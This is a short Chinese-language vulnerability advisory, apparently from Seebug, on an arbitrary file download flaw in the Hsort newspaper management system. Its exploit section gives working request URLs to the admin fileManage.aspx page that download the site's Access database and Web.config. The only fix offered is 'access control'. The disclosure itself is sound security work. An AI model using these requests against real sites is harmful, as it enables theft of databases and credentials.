Hsort报刊管理系统目录遍历漏洞

2016-04-11T00:00:00
ID SSV:91278
Type seebug
Reporter hhxx
Modified 2016-04-11T00:00:00

Description

0x01 框架介绍

HSORT提供数字报纸,电子报纸,电子杂志,新闻网系统,在线看报软件,全力助报社,政府,高校,集团企业等单位多媒体网络化平台搭建系统。

整个系统基于最新的微软.NET 3.5架构,可以方便的扩充和定制,极高的稳定性,让您的使用毫无后顾之忧。专业的团队,为您的报社服务。通过插件,可以方便的解读方正等的PS文件并转化为图片上传到系统中。

一套用于报刊杂志数字版发布、更新的软件,只需将包含文章内容的纯文本进行简单标识,就可由本软件根据模板快速生成整个网站的内容,可使更新效率大大提高,而且避免了手工更新容易出现错误的问题,是各中小报纸杂志社制作、更新自已的数字版网站的好助手. 根据当前互联网上新闻媒体的应用,我公司自主开发并推出了一款“数字报刊/杂志系统”发布系统软件。

下载链接:http://down.chinaz.com/soft/24070.htm

0x02 漏洞利用

Hsort报刊管理系统,有大量报社在使用,看到之前已经不少人提交过该系统的漏洞了,不过都是SQL注入吧。

还存在任意文件下载的问题,包括下载数据库。

以http://.../为例

http://.../Admin/fileManage.aspx?action=DOWNLOAD&value1=~%2FApp_Data%2FHsort.mdb

或者修改value1的值为其他文件路径,就可以下载相应的文件

http://.../Admin/fileManage.aspx?action=DOWNLOAD&value1=~%2FWeb.config

0x03 修复方案

权限控制